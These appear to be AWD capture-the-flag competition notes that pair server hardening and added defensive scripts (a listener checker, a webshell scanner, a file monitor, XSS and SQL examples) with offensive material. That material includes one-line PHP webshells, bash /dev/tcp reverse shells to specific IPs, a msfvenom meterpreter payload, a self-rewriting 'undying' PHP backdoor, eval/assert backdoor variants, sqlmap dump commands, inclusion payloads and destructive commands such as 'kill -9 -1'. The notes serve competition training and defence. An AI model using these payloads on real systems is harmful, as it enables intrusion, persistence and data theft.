AWD
Back up the source, change the account passwords, then check for backdoors and delete them.
Modify the mysql password
Format: mysqladmin -u <username> -p<old password> password <new password>
Example: mysqladmin -uroot -p123 password 123456
MySQL full backup and restore
Back up one database: mysqldump -u <username> -p<password> <database name> > /root/XXX.bak
This backs up the named database to root's home directory as XXX.bak.
Restore: mysql -u <username> -p<password> <database name> < /root/XXX.bak
One-line trojan (webshell)
<?php @eval($_REQUEST['pass']); ?> <%eval request("pass")%> <?php @eval($_POST['c']); ?>
Persistence: 1. undying trojan (不死马), 2. nc reverse shell: nc -lp 9999
ps auxww | grep shell.php; once the PID is found, kill the process
Edit the ssh config: vim /etc/ssh/sshd_config, set PermitRootLogin no
At the very end add AllowUsers liu liu1
Linux: change the owner and group of files
chgrp -R <group> <file>
chown -R <user> <file>
chmod -R 777 /var/home/userid/cc (world-writable; use the narrowest mode that still works)
1. View ports
netstat -tunpl; netstat -tunpl | grep 23 (check whether port 23 is open)
2. Find the application behind a port
lsof -i :xxx; look the process up with ps aux
3. Close the port
【iptable】
sudo iptables -A INPUT -p tcp --dport $PORT -j DROP
sudo iptables -A OUTPUT -p tcp --dport $PORT -j DROP
【kill】
ps aux
kill -9 PID (PID: process ID)
sudo /etc/init.d/apache2 restart
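Steps 1 and 2 above (list listening ports, then find the process behind each) and the later "ss -ltnp" backdoor-port check are easier to repeat under pressure when the listing is parsed and compared with what the host is supposed to run. The following is an added example, not a script from the original notes: it parses the text layout that `ss -ltnp` prints (assumed to be the usual iproute2 format), keeps an allowlist of expected ports, and reports every other listener with its PID so it can be inspected with `ps -fp` and, if unwanted, killed. The sample output is constructed, not captured from a real host; on a live box `live_ss_output()` runs the real command.

```python
"""Flag unexpected listening sockets in `ss -ltnp` output (added example)."""
import re
import subprocess
from dataclasses import dataclass

# Constructed sample in the layout `ss -ltnp` uses (assumption: current iproute2 format).
SAMPLE_SS_OUTPUT = """State  Recv-Q Send-Q Local Address:Port  Peer Address:Port Process
LISTEN 0      128    0.0.0.0:22          0.0.0.0:*        users:(("sshd",pid=812,fd=3))
LISTEN 0      511    *:80                *:*              users:(("apache2",pid=1204,fd=4))
LISTEN 0      80     127.0.0.1:3306      0.0.0.0:*        users:(("mysqld",pid=990,fd=21))
LISTEN 0      1      0.0.0.0:9999        0.0.0.0:*        users:(("nc",pid=4471,fd=3))
LISTEN 0      10     [::]:5555           [::]:*           users:(("bash",pid=4502,fd=4))
"""

# Ports this host is expected to serve (constructed allowlist; adjust per box).
ALLOWED_PORTS = {22, 80, 443, 3306}


@dataclass
class Listener:
    addr: str
    port: int
    process: str
    pid: int


# State Recv-Q Send-Q Local:Port Peer:Port Process
LINE_RE = re.compile(r"^LISTEN\s+\d+\s+\d+\s+(\S+):(\d+)\s+\S+\s+(.*)$")
PROC_RE = re.compile(r'\(\("([^"]+)",pid=(\d+)')


def parse_ss(text):
    """Turn `ss -ltnp` text into Listener records; non-LISTEN lines are skipped."""
    listeners = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        addr, port, rest = m.groups()
        pm = PROC_RE.search(rest)
        proc, pid = (pm.group(1), int(pm.group(2))) if pm else ("?", -1)
        listeners.append(Listener(addr, int(port), proc, pid))
    return listeners


def unexpected_listeners(listeners, allowed=ALLOWED_PORTS):
    """Everything listening on a port that is not on the allowlist."""
    return [l for l in listeners if l.port not in allowed]


def live_ss_output():
    """Run the real command on a host; fall back to the sample when offline."""
    try:
        return subprocess.run(["ss", "-ltnp"], capture_output=True,
                              text=True, check=True).stdout
    except (OSError, subprocess.CalledProcessError):
        return SAMPLE_SS_OUTPUT


if __name__ == "__main__":
    for l in unexpected_listeners(parse_ss(SAMPLE_SS_OUTPUT)):
        print(f"unexpected listener {l.addr}:{l.port} by {l.process} (pid {l.pid});"
              f" inspect with: ps -fp {l.pid}")
```

Run it once right after the box is hardened to build the allowlist, then rerun it on a timer; anything that appears on a port outside the allowlist (the `nc` and `bash` rows in the sample) is a candidate for the `kill <pid>` step in the backdoor section.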
A . Defense strategy
Command injection vulnerability
a) e.g. str1 = $_POST['cmd']: prepend the comment character '#' to str1 before it is concatenated, i.e. str1 = "#" . $_POST['cmd']
File upload vulnerability
a) comment out the upload code.
File inclusion vulnerability
a) edit php.ini and change
allow_url_fopen = On
allow_url_include = On
to
allow_url_fopen = Off
allow_url_include = Off
Remote code execution vulnerability
a) comment out dangerous functions: system(), shell_exec(), eval(), assert(), create_function(), preg_replace(), file_put_contents()
Buffer overflow vulnerability
a) refer to the defense under "7. Linux privilege vulnerability".
System backdoor vulnerabilities
a) delete the backdoor directly
b) "ps -ef | grep bash" to check for backdoor bash processes
c) "ss -ltnp" to check for backdoor listening ports
d) take the PID found in the two steps above and end the backdoor with "kill <pid>"
e) in the website directory, inspect the files; where a one-line webshell or trojan is found, delete the file or comment out the code
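Step e) is the slow one when the site has hundreds of files, so an added example follows that automates it. This is not a script from the original notes: it walks the web root, looks in every PHP file for the functions the notes call dangerous (system, shell_exec, eval, assert, create_function, preg_replace with the /e modifier, file_put_contents) and for the one-line trojan shape (eval, assert or a callback to assert fed straight from $_POST, $_GET or $_REQUEST), and also flags .user.ini or .htaccess files that set auto_prepend_file, the backdoor vector the WAF section mentions. It only reports file, line and pattern; deleting the file or commenting the code out stays a manual decision. The demo web root is constructed in a temporary directory.

```python
"""Hunt for one-line webshells and dangerous PHP functions in a web root (added example)."""
import os
import re
import tempfile

PHP_EXTS = (".php", ".phtml", ".php3", ".php5", ".inc")
CONFIG_FILES = (".user.ini", ".htaccess")

# (label, regex). Matches the forms listed in the notes, not a complete signature set.
PATTERNS = [
    ("one-line trojan",
     re.compile(r"\b(eval|assert)\s*\(\s*\$_(POST|GET|REQUEST)\b", re.I)),
    ("callback to assert",
     re.compile(r"\b(array_map|array_filter|call_user_func(?:_array)?)\s*\([^;]*['\"]assert['\"]", re.I)),
    ("preg_replace with /e modifier",
     re.compile(r"\bpreg_replace\s*\(\s*['\"]/.*?/[a-z]*e[a-z]*['\"]", re.I)),
    ("variable function called on request data",
     re.compile(r"\$\w+\s*\(\s*\$_(POST|GET|REQUEST)\b")),
    ("dangerous function",
     re.compile(r"\b(system|shell_exec|exec|passthru|popen|create_function|file_put_contents)\s*\(", re.I)),
]
CONFIG_PATTERNS = [
    ("auto_prepend/append_file directive", re.compile(r"auto_(prepend|append)_file", re.I)),
]


def scan_file(path, patterns=PATTERNS):
    """Return (path, line number, label, excerpt) for every line matching a pattern."""
    hits = []
    try:
        with open(path, encoding="utf-8", errors="replace") as fh:
            for lineno, line in enumerate(fh, 1):
                for label, rx in patterns:
                    if rx.search(line):
                        hits.append((path, lineno, label, line.strip()[:80]))
    except OSError:
        pass  # unreadable file: skip rather than abort the whole scan
    return hits


def scan_tree(root):
    """Scan PHP files with PATTERNS and per-directory config files with CONFIG_PATTERNS."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for fn in files:
            path = os.path.join(dirpath, fn)
            if fn in CONFIG_FILES:
                hits.extend(scan_file(path, CONFIG_PATTERNS))
            elif fn.lower().endswith(PHP_EXTS):
                hits.extend(scan_file(path))
    return hits


def build_demo_root():
    """Constructed sample site: one clean file, one dropped shell, one .user.ini."""
    root = tempfile.mkdtemp(prefix="webroot-")
    os.makedirs(os.path.join(root, "upload"))
    with open(os.path.join(root, "index.php"), "w") as f:
        f.write("<?php echo htmlspecialchars($_GET['q'] ?? ''); ?>\n")
    with open(os.path.join(root, "upload", "x.php"), "w") as f:
        f.write("<?php @eval($_POST['c']); ?>\n")
    with open(os.path.join(root, "upload", ".user.ini"), "w") as f:
        f.write("auto_prepend_file=x.png\n")
    return root


if __name__ == "__main__":
    for path, lineno, label, excerpt in scan_tree(build_demo_root()):
        print(f"{path}:{lineno}: {label}: {excerpt}")
```

Every hit needs a human look: a legitimate `waf.php` deployed through `auto_prepend_file`, or a framework's own `exec()` wrapper, will show up too. The point is to shrink the review from the whole tree to a handful of lines.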
Linux privilege vulnerability
a) "ps -ef | grep httpd" to check whether Apache runs as root; if it does, edit /etc/httpd/httpd.conf, set the User and Group fields to apache, and restart httpd so the service runs as the apache user.
b) rename key binaries such as /bin/cat and /bin/echo so an attacker cannot read the flag file from bash.
1. Anti-XSS
Use strip_tags() to strip HTML tags from strings;
use htmlspecialchars() to convert sensitive characters.
$message = mysql_real_escape_string($message);
Output as body text, or as an HTML tag attribute value:
for example <span>${username}</span>, <p><c:out value="${username}"></c:out></p>
<input type="text" value="${username}" />
In these cases the escape rules are:
< converted to &lt;
> converted to &gt;
& converted to &amp;
" converted to &quot;
' converted to &#39;
JavaScript events
<input type="button" onclick='go_to_url("${myUrl}");' />
Besides the escapes above, additionally escape:
\ converted to \\
/ converted to \/
; converted to ； (full-width semicolon)
E) URL attributes
If the src or href attribute of a <script>, <style>, <img> or similar tag is dynamic content, make sure it is not a malicious URL.
Ensure that the value of href and src begins with http:// (whitelist mode) and contains no decimal- or hexadecimal-encoded characters.
In a URL, "?" introduces the parameters; the dynamic parts are:
the name of the parameter being passed, and
the value of the parameter (encoded into the URL and decoded again on the server; usually the reflected-XSS injection point)
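The three rule sets above (HTML text/attribute, JavaScript event string, URL attribute) are one encoder each, chosen by where the value lands. The following is an added example and not code from the original notes, which refer to PHP's htmlspecialchars()/strip_tags() and JSP's <c:out>; the function names and the hostile sample values are constructed. For the ";" rule it uses the JavaScript hex escape \x3b rather than the full-width character the notes list, and the URL whitelist follows the notes literally (http:// only, no entity-encoded characters).

```python
"""Context-aware output escaping for the XSS rules above (added example)."""
import re

# HTML body / attribute context: the five characters the notes list; '&' first
# so entities produced by the later replacements are not re-encoded.
HTML_ESCAPES = (("&", "&amp;"), ("<", "&lt;"), (">", "&gt;"), ('"', "&quot;"), ("'", "&#39;"))


def escape_html(value):
    for ch, ent in HTML_ESCAPES:
        value = value.replace(ch, ent)
    return value


def escape_js_string(value):
    # For onclick='go_to_url("${x}")' the value is a JS string literal inside an
    # HTML attribute: JS-escape first (\ / ; plus the quotes and angle brackets,
    # as \xNN hex escapes), then HTML-escape so the value cannot close the attribute.
    js = (value.replace("\\", "\\\\")
               .replace("/", "\\/")
               .replace('"', '\\"')
               .replace("'", "\\'")
               .replace(";", "\\x3b")
               .replace("<", "\\x3c")
               .replace(">", "\\x3e"))
    return escape_html(js)


# URL attribute context (href/src): http:// scheme, host, optional port, and an
# optional path/query drawn from a conservative character set.
SAFE_URL_RE = re.compile(r"^http://[A-Za-z0-9.\-]+(:\d+)?(/[A-Za-z0-9._~\-/?=&]*)?$")
# Decimal (&#106;) or hexadecimal (&#x6A;) entity-encoded characters are rejected.
ENTITY_ENCODED_RE = re.compile(r"&#x?[0-9a-f]+;?", re.I)


def safe_url(value, fallback="#"):
    """Whitelist check for href/src values; anything doubtful becomes the fallback."""
    if ENTITY_ENCODED_RE.search(value) or not SAFE_URL_RE.match(value):
        return fallback
    return value


def render_profile(username, my_url):
    """Render the fragments from the notes, each with the encoder for its context."""
    return "\n".join([
        f"<span>{escape_html(username)}</span>",
        f'<input type="text" value="{escape_html(username)}" />',
        f'<input type="button" onclick=\'go_to_url("{escape_js_string(my_url)}");\' />',
        f'<a href="{escape_html(safe_url(my_url))}">profile</a>',
    ])


if __name__ == "__main__":
    # Constructed hostile inputs: a script tag as the name, a string-breakout as the URL.
    print(render_profile('<script>alert("x")</script>', 'http://example.com/");alert(1);//'))
```

The order in `escape_js_string` matters: JS escaping happens first, then HTML escaping, because the browser decodes the attribute before the JavaScript engine sees the string. In practice the URL whitelist would also admit https://, which the notes do not mention.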
F) Upload a WAF
If the web framework is written and deployed well, it may be necessary to rewrite a file or the database file directly. If the PHP files are scattered there are other ways: if PHP runs under FastCGI (common with nginx and IIS), add it in .user.ini (search Baidu for the details; .user.ini backdoors work on the same principle). In other cases it may be necessary to write a script that prepends it to every PHP file; sample script code will be released. (Apache .htaccess can also be forced to run the WAF and then return the original page, but it may not override the environment.)
1. Upload waf.php to the directory whose files will include it
2. Add the page guard; there are two approaches, chosen according to the situation:
a) add to each page that needs protection:
require_once('waf.php');
This gives page-level anti-injection and anti-XSS.
For site-wide anti-injection, put it in a file that every page includes, such as the database connection file config.inc.php!
Add the line require_once('waf.php'); to call it
Common PHP systems and the file to add it to:
PHPCMS V9: \phpcms\base.php
PHPWIND 8.7: \data\sql_config.php
DEDECMS 5.7: \data\common.inc.php
DiscuzX2: \config\config_global.php
Wordpress: \wp-config.php
MetInfo: \include\head.php
b) prepend the code to every file
Find in php.ini:
; Automatically add files before or after any PHP document.
auto_prepend_file = <path to waf.php>
Common hardening methods:
Hardening process:
- Change the webmaster password
- Back up the website source
- tar -zcf /tmp/name.tar.gz /path/web
- tar -zcf /tmp/name.tar.gz /var/www/html
- Back up the database
- mysqldump -u <username> -p <database name> > <export file name>
- mysqldump -u user -p database > /tmp/database.sql
- Change the ssh password (i.e. the current user's password)
- Change the MySQL password
- set password for '<username>'@'localhost' = password('<new password>');
- set password for user@localhost = password('123');
- Change the MongoDB password (port 27017)
- Change the Redis password (port 6379)
- Update the database connection configuration in the website source
- Deploy a WAF (if one is available)
File monitoring
Prepare a script that monitors for new files and deletes all of them.
If a memory-resident trojan is found, restart PHP directly.
If no monitoring script is available, review and fix new files periodically with the command:
find <web path> -ctime -1 (files created or changed in the last day are suspect)
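The monitoring script the notes ask for, and the pyinstaller-packaged one the CTFDefense section describes, both reduce to a baseline-and-diff loop. The following is an added example, not the notes' own script: it records size, mtime and SHA-256 for every file under the web root, then on each pass reports new, modified and deleted files. New files are moved to a quarantine directory rather than deleted outright so a false positive (a legitimate upload, a file a teammate just fixed) can be put back, and modified files are reported so they can be restored from the tarball taken in the hardening steps. It polls with the standard library instead of using inotify so it runs anywhere; directory names and sample files are constructed.

```python
"""Baseline-and-diff file monitor for a web root (added example)."""
import hashlib
import os
import shutil
import tempfile
import time


def file_digest(path):
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def snapshot(root):
    """Map relative path -> (size, mtime, sha256) for every regular file under root."""
    state = {}
    for dirpath, _, files in os.walk(root):
        for fn in files:
            path = os.path.join(dirpath, fn)
            try:
                st = os.stat(path)
                state[os.path.relpath(path, root)] = (st.st_size, int(st.st_mtime), file_digest(path))
            except OSError:
                continue  # file vanished between walk and stat
    return state


def diff_states(baseline, current):
    new = sorted(set(current) - set(baseline))
    deleted = sorted(set(baseline) - set(current))
    modified = sorted(p for p in set(baseline) & set(current) if baseline[p][2] != current[p][2])
    return new, modified, deleted


def quarantine(root, relpaths, qdir):
    """Move files out of the web root, keeping the original path inside the new name."""
    os.makedirs(qdir, exist_ok=True)
    moved = []
    for rel in relpaths:
        dst = os.path.join(qdir, f"{int(time.time())}_{rel.replace(os.sep, '__')}")
        shutil.move(os.path.join(root, rel), dst)
        moved.append(dst)
    return moved


def check_once(root, baseline, qdir):
    """One pass against a fixed baseline; returns what was found and what was quarantined."""
    new, modified, deleted = diff_states(baseline, snapshot(root))
    return {"new": new, "modified": modified, "deleted": deleted,
            "quarantined": quarantine(root, new, qdir)}


def watch(root, qdir, interval=2.0):
    """Poll forever (Ctrl-C to stop). The baseline is taken once, at start."""
    baseline = snapshot(root)
    while True:
        time.sleep(interval)
        report = check_once(root, baseline, qdir)
        for kind in ("new", "modified", "deleted"):
            for rel in report[kind]:
                print(f"[{time.strftime('%H:%M:%S')}] {kind}: {rel}")


def demo():
    """Constructed scenario: take a baseline, then drop one file and edit another."""
    root = tempfile.mkdtemp(prefix="www-")
    qdir = tempfile.mkdtemp(prefix="quarantine-")
    with open(os.path.join(root, "index.php"), "w") as f:
        f.write("<?php echo 'ok'; ?>\n")
    baseline = snapshot(root)
    with open(os.path.join(root, "up.php"), "w") as f:
        f.write("<?php /* dropped after baseline */ ?>\n")
    with open(os.path.join(root, "index.php"), "a") as f:
        f.write("// appended after baseline\n")
    report = check_once(root, baseline, qdir)
    return report, os.path.exists(os.path.join(root, "up.php"))


if __name__ == "__main__":
    print(demo()[0])
```

Take the baseline only after the source has been backed up and cleaned, otherwise an existing webshell becomes part of "normal". Comparing digests rather than mtimes is deliberate: the undying-trojan script later in these notes shows `touch -m` being used to forge timestamps.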
(1) User login: enter ' to test for a SQL injection point; the universal password ' or 1='1; weak passwords such as admin/admin; Firefox plugin HackBar
select name,pass from tbAdmin where name='' or 1='1' and pass='123456'
(2) Ah D scans the website for SQL injection points, sqlmap does the injection
Injection point of an Access database in a competition:
http://10.1.14.1/ReadNews.asp?NewsID=20&BigClassID=2&SmallClassID=2
sqlmap -u "url" show system and version
sqlmap -u "url" --dbs enumerate databases
sqlmap -u "url" --tables -D ctf enumerate tables
sqlmap -u "url" --column -D ctf -T users enumerate columns
sqlmap -u "url" --dump -D ctf -T users "user_name,user_pass" dump fields
The website's database password file is generally config.php.
3. File inclusion
(1) Local file inclusion
localhost/a.php?file=/flag.txt
(2) Remote file inclusion
localhost/a.php?file=http://ip/echo.txt
Use: upload a one-line trojan
Content of echo.txt; it writes shell.php containing a one-line trojan.
<?php fputs(fopen("shell.php","w"),"<?php eval(\$_POST[xx]);?>");?>
Common file-inclusion functions: include(), include_once(), require(), require_once()
Several classic test methods:
?file=../../../../etc/passwd (directory traversal)
?page=file:///etc/passwd (read sensitive files)
?home=main.cgi
?page=http://www.a.com/1.php
http://1.1.1.1/../../../../dir/file.txt
Remote inclusion requires allow_url_fopen = On and allow_url_include = On.
4. Unauthorized access (越权)
Horizontal: change the id to view other users' data
Vertical: knowing the admin backend URL, access it directly to gain privileges and data.
/admin/upload/config.php unauthorized access: displayed directly without logging in
Website defense
WAF, file monitoring, Safedog (安全狗),
Write require_once('waf.php'); in the header
Where the flag may be:
- Yujian (御剑) directory scan; double-click to open the page and the flag is there.
- ssh login: the system root directory, /var/www/html
- MySQL database fields.
- Remote desktop host: folders
Capture the PHP site's web traffic for application analysis.
Usable in offline CTF competitions, and in real scenarios for analysing attacks in web traffic.
Using weblogger-master:
cd /var/www/html/ (or other web dir)
git clone https://github.com/wupco/weblogger.git
chmod -R 777 weblogger/
open http://xxxxx/weblogger/install.php in a web browser
and run the installer
CTFDefense
1. ctf-firewall.sh
iptables configuration commands; can be run in one step for quick configuration. May need slight changes depending on the environment.
2. commannd.md
Common Linux commands for offline competitions
3. getRoot
Some local privilege-escalation PoCs; each file has detailed usage notes, and the compiled files are in the release directory. There are also several practical scripts.
4. Display
A simple file-monitoring sample script that watches create, delete, move and attribute changes and automatically deletes new files or directories. Packaged with pyinstaller into a Linux executable.
5. WAF
The Linux version of Safedog and several WAF scripts
nmap -nv ip (-n: no DNS resolution)
nmap -sS ip (SYN scan)
High intensity: nmap -T4 -A
python -c 'import pty;pty.spawn("/bin/bash")'
tar -zcf /tmp/xxx.tar.gz html
tar -xzvf /tmp/xxx.tar.gz
mysqldump -uxxx -pxxx dbname > xxx.sql
passwd
Change the webmaster password
update users set password=md5("xxxxxx");
Change the database password
set password for '<username>'@'localhost' = password('<new password>');
bash -i >& /dev/tcp/10.51.4.222/8384 0>&1
bash -i >& /dev/tcp/10.11.23.226/5555 0>&1
/bin/bash -i &> /dev/tcp/10.51.4.222/8384 0>&1
echo "/bin/bash -i &> /dev/tcp/10.11.20.71/5555 0>&1" | /bin/bash
rm -rf / var / www / html / upload_lab / upload / *
zip:///var/www/html/upload/test.zip#test.php
http://123.206.174.251/include/2/?
op=zip://uploads/ea064516fe1e37af816bb52faa08eeb8589af4c0.png%23p
Use msf
msfvenom -p php/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=5555-f raw > 77778888.php
msfconsole:
use multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 5555
set ExitOnSession false
run -j
PHP undying trojan (不死马)
caidao (China Chopper)
<?php
ignore_user_abort(true);
set_time_limit(0);
unlink(__FILE__);
$file = '/var/www/dvwa/.ski12.php';
$file = 'D:\\z_myweb\\phpStudy\\DVWA-master\\dvwa\\busi.php';
$code = '<?php if(md5($_GET["pass"])=="cdd7b7420654eb16c1e1b748d5b7c5b8"){@eval($_POST['a']);}?>';
while (1) {
file_put_contents($file, $code);
//system('touch -m -d "2018-12-01 09:10:12" .ski12.php');
usleep(5000);
}
Backdoors
eval($_POST["a"]);
assert($_POST["a"]); can also be written $a = "assert"; $a($_POST[a]);
array_filter(array($_POST["a"]), "assert");
preg_replace("/test/e", $_POST["a"], "just test");
$func = create_function('', $_POST['a']); $func();
echo array_map("assert", array($_POST["a"]));
call_user_func("assert", $_POST['cmd']);
call_user_func_array("assert", array($_POST["a"]));
and many more
Remove the undying trojan
kill -9 -1
Add a new Linux user
useradd -m username1
passwd username1
usermod -a -G sudo username1
Anti-injection
addslashes
htmlspecialchars
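addslashes and htmlspecialchars are escaping functions; the control that actually removes SQL injection is the parameterised query, which is what the login example earlier in these notes (select name,pass from tbAdmin where name='' or 1='1' and pass='123456') lacks. The following is an added example, not code from the original notes: it builds a throwaway SQLite database with the same table shape and constructed rows, shows the concatenated query accepting the universal-password payload ' or '1'='1 in both fields, and shows the parameterised query rejecting it while still accepting real credentials. Passwords are stored in clear only to mirror the notes' schema.

```python
"""Parameterised queries as the real anti-injection control (added example)."""
import sqlite3

UNIVERSAL = "' or '1'='1"   # the universal-password payload from the notes


def make_db():
    """In-memory database with the notes' tbAdmin(name, pass) shape; one constructed row."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table tbAdmin(name text, pass text)")
    conn.execute("insert into tbAdmin values ('admin', 'S3cret!')")
    return conn


def build_concat_sql(name, password):
    """How the vulnerable query is assembled; returned as text so it can be inspected."""
    return f"select name,pass from tbAdmin where name='{name}' and pass='{password}'"


def login_concat(conn, name, password):
    # User input becomes part of the SQL grammar: quotes and OR change the WHERE clause.
    return conn.execute(build_concat_sql(name, password)).fetchone() is not None


def login_param(conn, name, password):
    # Placeholders: the driver passes the values separately, so quotes in them are data.
    sql = "select name,pass from tbAdmin where name=? and pass=?"
    return conn.execute(sql, (name, password)).fetchone() is not None


if __name__ == "__main__":
    conn = make_db()
    print(build_concat_sql(UNIVERSAL, UNIVERSAL))
    print("concat:", login_concat(conn, UNIVERSAL, UNIVERSAL))   # True: bypassed
    print("param: ", login_param(conn, UNIVERSAL, UNIVERSAL))    # False
```

In PHP the same shape is PDO's prepare()/execute() with bound parameters; addslashes only matters for the legacy concatenated form, and htmlspecialchars belongs to output encoding (the XSS section), not to SQL at all.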